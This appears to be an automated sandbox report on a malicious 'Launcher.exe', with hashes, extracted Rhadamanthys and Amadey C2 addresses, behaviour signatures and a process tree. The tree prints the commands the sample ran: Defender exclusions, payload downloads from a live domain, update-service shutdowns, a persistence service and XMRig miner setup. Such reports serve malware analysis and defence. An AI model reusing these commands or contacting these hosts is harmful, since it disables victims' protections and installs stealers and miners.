Analysis

  • max time kernel
    148s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-08-2024 11:57

General

  • Target

    Launcher.exe

  • Size

    364KB

  • MD5

    93fde4e38a84c83af842f73b176ab8dc

  • SHA1

    e8c55cc160a0a94e404f544b22e38511b9d71da8

  • SHA256

    fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

  • SHA512

    48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

  • SSDEEP

    6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Malware Config

Extracted

Family

rhadamanthys

C2

https://45.159.188.37:443/44194499adc4d2b753ee/gcj8ajmp.qnu3f

Extracted

Family

amadey

Version

4.41

Botnet

3dae01

C2

http://185.208.158.116

http://185.209.162.226

http://89.23.103.42

Attributes
  • install_dir

    239f17af5a

  • install_file

    Hkbsse.exe

  • strings_key

    91a6d9abcd7a774809c7ff7ced665178

  • url_paths

    /hb9IvshS01/index.php

    /hb9IvshS02/index.php

    /hb9IvshS03/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Start PowerShell.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Executes dropped EXE 15 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 24 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies data under HKEY_USERS 50 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3044
      • C:\Windows\SysWOW64\openwith.exe
        "C:\Windows\system32\openwith.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4896
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      1⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:2592
      • C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
        "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
            "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4884
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2500
            • C:\Users\Admin\AppData\Roaming\services\wget.exe
              "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of FindShellTrayWindow
              PID:2644
            • C:\Users\Admin\AppData\Roaming\services\winrar.exe
              "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01*.* "1\*" C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:3808
            • C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe
              "C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe"
              5⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1484
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 616
                6⤵
                • Program crash
                PID:228
            • C:\Users\Admin\AppData\Roaming\services\wget.exe
              "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1748
            • C:\Users\Admin\AppData\Roaming\services\winrar.exe
              "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              PID:1180
            • C:\Users\Admin\AppData\Roaming\services\2plugin27724
              C:\Users\Admin\AppData\Roaming\services\2plugin27724
              5⤵
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4452
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3096
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2376
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  7⤵
                    PID:2768
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  6⤵
                  • Launches sc.exe
                  PID:3412
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  6⤵
                  • Launches sc.exe
                  PID:852
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  6⤵
                  • Launches sc.exe
                  PID:1852
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  6⤵
                  • Launches sc.exe
                  PID:2624
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  6⤵
                  • Launches sc.exe
                  PID:1968
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4932
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4052
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3012
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  6⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4548
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "OZLCSUZD"
                  6⤵
                  • Launches sc.exe
                  PID:4560
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
                  6⤵
                  • Launches sc.exe
                  PID:3900
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  6⤵
                  • Launches sc.exe
                  PID:3400
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "OZLCSUZD"
                  6⤵
                  • Launches sc.exe
                  PID:4312
              • C:\Users\Admin\AppData\Roaming\services\wget.exe
                "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition https://buscocurro.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                • Suspicious use of FindShellTrayWindow
                PID:4852
              • C:\Users\Admin\AppData\Roaming\services\winrar.exe
                "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:3412
              • C:\Users\Admin\AppData\Roaming\services\3plugin29563
                C:\Users\Admin\AppData\Roaming\services\3plugin29563
                5⤵
                • Checks computer location settings
                • Drops file in Windows directory
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:2028
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 852
                  6⤵
                  • Program crash
                  PID:1872
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 920
                  6⤵
                  • Program crash
                  PID:4684
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 980
                  6⤵
                  • Program crash
                  PID:3708
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 880
                  6⤵
                  • Program crash
                  PID:2280
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1020
                  6⤵
                  • Program crash
                  PID:1180
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1028
                  6⤵
                  • Program crash
                  PID:4312
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1264
                  6⤵
                  • Program crash
                  PID:2288
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1336
                  6⤵
                  • Program crash
                  PID:4804
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1328
                  6⤵
                  • Program crash
                  PID:4552
                • C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
                  "C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2924
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 684
                    7⤵
                    • Program crash
                    PID:3384
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 728
                    7⤵
                    • Program crash
                    PID:3400
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 732
                    7⤵
                    • Program crash
                    PID:4752
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 892
                    7⤵
                    • Program crash
                    PID:2740
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 892
                    7⤵
                    • Program crash
                    PID:4644
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 924
                    7⤵
                    • Program crash
                    PID:1644
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 964
                    7⤵
                    • Program crash
                    PID:1680
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1048
                    7⤵
                    • Program crash
                    PID:1936
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1060
                    7⤵
                    • Program crash
                    PID:4792
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1396
                    7⤵
                    • Program crash
                    PID:3808
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1140
                  6⤵
                  • Program crash
                  PID:3584
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 1620
                  6⤵
                  • Program crash
                  PID:2352
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4796
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3668,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4348 /prefetch:8
        1⤵
          PID:3096
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1484 -ip 1484
          1⤵
            PID:5004
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2028 -ip 2028
            1⤵
              PID:5004
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2028 -ip 2028
              1⤵
                PID:3744
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2028 -ip 2028
                1⤵
                  PID:3900
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2028 -ip 2028
                  1⤵
                    PID:2592
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2028 -ip 2028
                    1⤵
                      PID:2352
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2028 -ip 2028
                      1⤵
                        PID:4280
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2028 -ip 2028
                        1⤵
                          PID:4292
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2028 -ip 2028
                          1⤵
                            PID:848
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2028 -ip 2028
                            1⤵
                              PID:4372
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2028 -ip 2028
                              1⤵
                                PID:4644
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2028 -ip 2028
                                1⤵
                                  PID:3256
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2924 -ip 2924
                                  1⤵
                                    PID:3600
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2924 -ip 2924
                                    1⤵
                                      PID:2236
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2924 -ip 2924
                                      1⤵
                                        PID:2956
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2924 -ip 2924
                                        1⤵
                                          PID:4908
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2924 -ip 2924
                                          1⤵
                                            PID:3464
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2924 -ip 2924
                                            1⤵
                                              PID:1852
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2924 -ip 2924
                                              1⤵
                                                PID:4324
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2924 -ip 2924
                                                1⤵
                                                  PID:2912
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2924 -ip 2924
                                                  1⤵
                                                    PID:2376
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2924 -ip 2924
                                                    1⤵
                                                      PID:820
                                                    • C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
                                                      C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
                                                      1⤵
                                                      • Drops file in System32 directory
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3340
                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1080
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        2⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2152
                                                        • C:\Windows\system32\wusa.exe
                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                          3⤵
                                                            PID:2484
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop UsoSvc
                                                          2⤵
                                                          • Launches sc.exe
                                                          PID:4932
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                          2⤵
                                                          • Launches sc.exe
                                                          PID:4556
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop wuauserv
                                                          2⤵
                                                          • Launches sc.exe
                                                          PID:4652
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop bits
                                                          2⤵
                                                          • Launches sc.exe
                                                          PID:3540
                                                        • C:\Windows\system32\sc.exe
                                                          C:\Windows\system32\sc.exe stop dosvc
                                                          2⤵
                                                          • Launches sc.exe
                                                          PID:3836
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                          2⤵
                                                          • Power Settings
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4564
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                          2⤵
                                                          • Power Settings
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5060
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                          2⤵
                                                          • Power Settings
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1440
                                                        • C:\Windows\system32\powercfg.exe
                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                          2⤵
                                                          • Power Settings
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4068
                                                        • C:\Windows\system32\conhost.exe
                                                          C:\Windows\system32\conhost.exe
                                                          2⤵
                                                            PID:3964
                                                          • C:\Windows\system32\dwm.exe
                                                            dwm.exe
                                                            2⤵
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4696
                                                        • C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
                                                          C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
                                                          1⤵
                                                          • Executes dropped EXE
                                                          PID:4784
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 436
                                                            2⤵
                                                            • Program crash
                                                            PID:3496
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4784 -ip 4784
                                                          1⤵
                                                            PID:1732
                                                          • C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
                                                            C:\Users\Admin\AppData\Local\Temp\239f17af5a\Hkbsse.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:5056
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 236
                                                              2⤵
                                                              • Program crash
                                                              PID:2180
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5056 -ip 5056
                                                            1⤵
                                                              PID:2216

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Filesize

                                                              53KB

                                                              MD5

                                                              d4d8cef58818612769a698c291ca3b37

                                                              SHA1

                                                              54e0a6e0c08723157829cea009ec4fe30bea5c50

                                                              SHA256

                                                              98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

                                                              SHA512

                                                              f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              18KB

                                                              MD5

                                                              8942c241a54a0813a0324e34f8c58a64

                                                              SHA1

                                                              a010383a885c9ae204f1e95c6127bf842d6580a1

                                                              SHA256

                                                              d6dc08fb99ff7f303efe05bf117bdb0ce535b09ee5bc0024cf903a68040eeb72

                                                              SHA512

                                                              f58ce19b58b1952c2c9f223a042997eb1d81f398ec4f14b3468cd875d03fb80b203a70d81345634148d100dfb516bb73545c019c031b5147fefd9160620be432

                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pdpo0zr4.rbr.ps1

                                                              Filesize

                                                              60B

                                                              MD5

                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                              SHA1

                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                              SHA256

                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                              SHA512

                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                            • C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

                                                              Filesize

                                                              12B

                                                              MD5

                                                              70e920f6a8ad54dd919e87cd2644dc98

                                                              SHA1

                                                              4d307875622311f005dc4f43d4f0af1f6fc388de

                                                              SHA256

                                                              60b8c363841277cdcee6be58f28179dd8d17bf5fa9a4885eb7d81ad9f2185b3e

                                                              SHA512

                                                              307376f36c40059dc04857b0d3bbf56e465ae631f4613942306381180a6eb2b919cb5d3ad3cb0d7c2afb6190b7dcbf9c420acdcaaabfcee63d0037caddd4260d

                                                            • C:\Users\Admin\AppData\Roaming\services\0127871.rar

                                                              Filesize

                                                              2.9MB

                                                              MD5

                                                              3ba7655d55f35256e14307d9ab7f560c

                                                              SHA1

                                                              b5d14e76f894b643860e69f5a2d9308d4b0c1fcb

                                                              SHA256

                                                              262bc2b98e4579e3c97376b9f8b7c12f56b0cc75519914057a44b8fc580ded6c

                                                              SHA512

                                                              a73cda3b1d2cbb1cd7f320ee8b31659d2890a958392ef2ce83eacd320357d095680e160bc25efecd82726d541ce38bdc623a4ee75301fbe76e58b96aaab8dc2b

                                                            • C:\Users\Admin\AppData\Roaming\services\02plugins23208.rar

                                                              Filesize

                                                              9.6MB

                                                              MD5

                                                              557b45a8dfe391ada925b428815343a7

                                                              SHA1

                                                              4cee18d01e3a1e3dfbce90a38b9f2687bdb73e90

                                                              SHA256

                                                              da6879957bd50c9fb45a0bed227f521f2398f65dc1a31904a494ec764d3759d3

                                                              SHA512

                                                              42efc37605923263fa5a215c645e56fcc998c4ee5a24e3086911e23ba55f90162ec3be5f908e0ac065c697bd5d3dc4aceb460fa4aa19cea9999db2708ba75bbd

                                                            • C:\Users\Admin\AppData\Roaming\services\03plugins10863.rar

                                                              Filesize

                                                              2.9MB

                                                              MD5

                                                              e8891a8b9d48c36ace38613a3ee58e65

                                                              SHA1

                                                              45b5010846dc9386c57f6a0f3715af951683b0be

                                                              SHA256

                                                              64cb56c7af6ec8628a343e0e1d47e52f9353aae5835f243d177577d7a3ccd05c

                                                              SHA512

                                                              9ec8424ba8d8773d581dd95dc4f70ad9ed529e4640f6061ad8a668966124ee39d734466bf14210d71afdd773c98302e490a47ac89dde1fa6ad1981baf00aa0a4

                                                            • C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe

                                                              Filesize

                                                              467KB

                                                              MD5

                                                              ab2d2914e268ac8754e408bdd6c109cd

                                                              SHA1

                                                              936a1529158b699ebfaf97e937f17936d321920c

                                                              SHA256

                                                              0f5978c1e5026feea6e28485ceb99b48105d73a77517faf40c1e57d638a5cdd4

                                                              SHA512

                                                              c421cb6c41640e1866b891c941151903ad51e04a437b6d90faa6c732f2e98ef4172631453f9a60dcd8c0e4ffd39ec8c13277961c06a4119b10aff91037318fcf

                                                            • C:\Users\Admin\AppData\Roaming\services\2plugin27724

                                                              Filesize

                                                              7.2MB

                                                              MD5

                                                              59dd26d0a0781afb903b222a340a135a

                                                              SHA1

                                                              dc7eb315e84f9e828376d5421108685d997099aa

                                                              SHA256

                                                              d782048432be8fe4ce0fbcaaf54724202ac39a293c2a6ae5cda2c7f04aa2c967

                                                              SHA512

                                                              e4baf948f1023fc04aa9344ed0bde468566a429c4807f584204a6de95113de78dd2faaedad56e064f3023510fe774386a844becd0f9453d53884e31d4b345ed1

                                                            • C:\Users\Admin\AppData\Roaming\services\3plugin29563

